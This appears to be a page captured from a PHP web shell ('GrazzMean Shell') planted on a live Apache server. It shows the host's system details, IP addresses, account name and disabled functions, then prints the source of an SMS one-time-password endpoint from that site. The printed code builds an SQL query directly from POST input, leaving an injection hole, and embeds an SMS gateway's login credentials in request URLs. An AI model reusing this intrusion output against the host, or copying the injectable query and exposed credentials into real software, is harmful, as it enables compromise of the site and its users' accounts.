shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : smskiapi.php
<?php 
    spl_autoload_register(function($class) {
  include("../admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();

if(isset($_POST['mobile']) && isset($_POST['otp'])){
                    $phone = $_POST['mobile'];   
                    $otp = $_POST['otp'];   
                    if(isset($_POST['reg']) && $_POST['reg'] == '1')
                    {
                         
                        $cnd15 = "p_mobile='$phone'";
                        $check15 = $sqlfun->fetchdata("player",$cnd15);
                        if($check15->rowCount() > 0)
                            {
                                 echo  json_encode(array("res"=>"failure","msg"=>"phone number already exists","data"=>new stdClass()));
                            }
                            else
                            {
    
    
                            function run_sms_api($a,$b){
                            	$ch = curl_init(); 
                            	$mobile = $a;
                            	$message = urlencode("$b");
                                $url = "https://servermsg.com/api/SmsApi/SendSingleApi?UserID=rishabhabh&Password=123789&SenderID=PRMKRT&Phno=".$mobile."&Msg=".$message."&EntityID=1201159100028159923&TemplateID=1207161777416832045";
                                curl_setopt($ch, CURLOPT_URL, $url);
                            	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            	return $result = curl_exec($ch);
                            
                            }
                            
                            $result11=  run_sms_api($phone,$otp." is your one time password. Do not share any one.");
                            if(!empty($result11))
                                    {
                                        echo json_encode(array("res"=>"success","msg"=>"sent successfully","data"=>new stdClass()));
                                    }
                                    else
                                    {
                                        echo json_encode(array("res"=>"failure","msg"=>"not sent successfully","data"=>new stdClass()));
                                    }
                        }
                        
                    }else
                    {
                       
                                function run_sms_api($a,$b){
                            	$ch = curl_init(); 
                            	$mobile = $a;
                            	$message = urlencode("$b");
                                $url = "http://servermsg.com/api/SmsApi/SendSingleApi?UserID=rishabhabh&Password=123789&SenderID=PRMKRT&Phno=".$mobile."&Msg=".$message."&EntityID=1201159100028159923&TemplateID=1207161777416832045";
                                curl_setopt($ch, CURLOPT_URL, $url);
                            	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            	return $result = curl_exec($ch);
                            
                            }
                            
                            $result11=  run_sms_api($phone,$otp." is your one time password. Do not share any one.");
                            if(!empty($result11))
                                    {
                                        echo json_encode(array("res"=>"success","msg"=>"sent successfully","data"=>new stdClass()));
                                    }
                                    else
                                    {
                                        echo json_encode(array("res"=>"failure","msg"=>"not sent successfully","data"=>new stdClass()));
                                    }
                        
                    }
}
© 2026 GrazzMean